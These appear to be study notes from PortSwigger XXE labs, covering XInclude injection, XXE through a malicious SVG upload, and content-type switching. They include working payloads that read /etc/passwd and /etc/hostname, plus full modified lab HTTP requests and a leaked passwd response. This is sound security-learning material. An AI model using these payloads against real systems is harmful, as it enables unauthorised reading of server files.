XInclude Attacks
When client-submitted data is placed into a back-end SOAP request, you cannot carry out a classic XXE attack, because you donāt control the entire XML document and so cannot define or modify aĀ DOCTYPEĀ element.
However, you might be able to useĀ XIncludeĀ instead.Ā XIncludeĀ is a part of the XML specification that allows an XML document to be built from sub-documents.
To perform anĀ XIncludeĀ attack, you need to reference theĀ XIncludeĀ namespace and provide the path to the file that you wish to include. For example:
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>Lab: Exploiting XInclude to Retrieve Files
The original request:
POST /product/stock HTTP/2
Host: 0ac40010040c90418252100b00ae0075.web-security-academy.net
Cookie: session=Md8A8x5RjU8P4I0XuQ4O9BCWf2D9IS05
Content-Length: 132
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Origin: https://0ac40010040c90418252100b00ae0075.web-security-academy.net
Referer: https://0ac40010040c90418252100b00ae0075.web-security-academy.net/product?productId=1
productId=1&storeId=1Change request body into this:
POST /product/stock HTTP/2
Host: 0ac40010040c90418252100b00ae0075.web-security-academy.net
Cookie: session=Md8A8x5RjU8P4I0XuQ4O9BCWf2D9IS05
Content-Length: 132
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Origin: https://0ac40010040c90418252100b00ae0075.web-security-academy.net
Referer: https://0ac40010040c90418252100b00ae0075.web-security-academy.net/product?productId=1
productId=
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
&storeId=1Response has the content of /etc/passwd as expected:
HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 2341
"Invalid product ID:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinXXE Attacks via File Upload
Some applications allow users to upload files which are then processed server-side. Some common file formats use XML or contain XML subcomponents.
Even if the application expects to receive a format like PNG or JPEG, the image processing library that is being used might support SVG images. Since the SVG format uses XML, an attacker can submit a malicious SVG image and so reach hidden attack surface for XXE vulnerabilities.
Lab: Exploiting XXE via Image File Upload
Use the following payload from An SVG āimageā that uses an XXE attack to embed the hostname file of whichever system processes it into the image itself (github.com):
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text></svg> Content of /etc/hostname will be displayed as an image.
XXE Attacks via Modified Content Type
Most POST requests use a default content type that is generated by HTML forms, such asĀ application/x-www-form-urlencoded. Some web sites expect to receive requests in this format but will tolerate other content types, including XML.
For example, if a normal request contains the following:
POST /action HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
foo=barThen you might be able submit the following request, with the same result:
POST /action HTTP/1.0
Content-Type: text/xml
Content-Length: 52
<?xml version="1.0" encoding="UTF-8"?><foo>bar</foo>Related
list
from outgoing([[Port Swigger -]])
sort file.ctime asc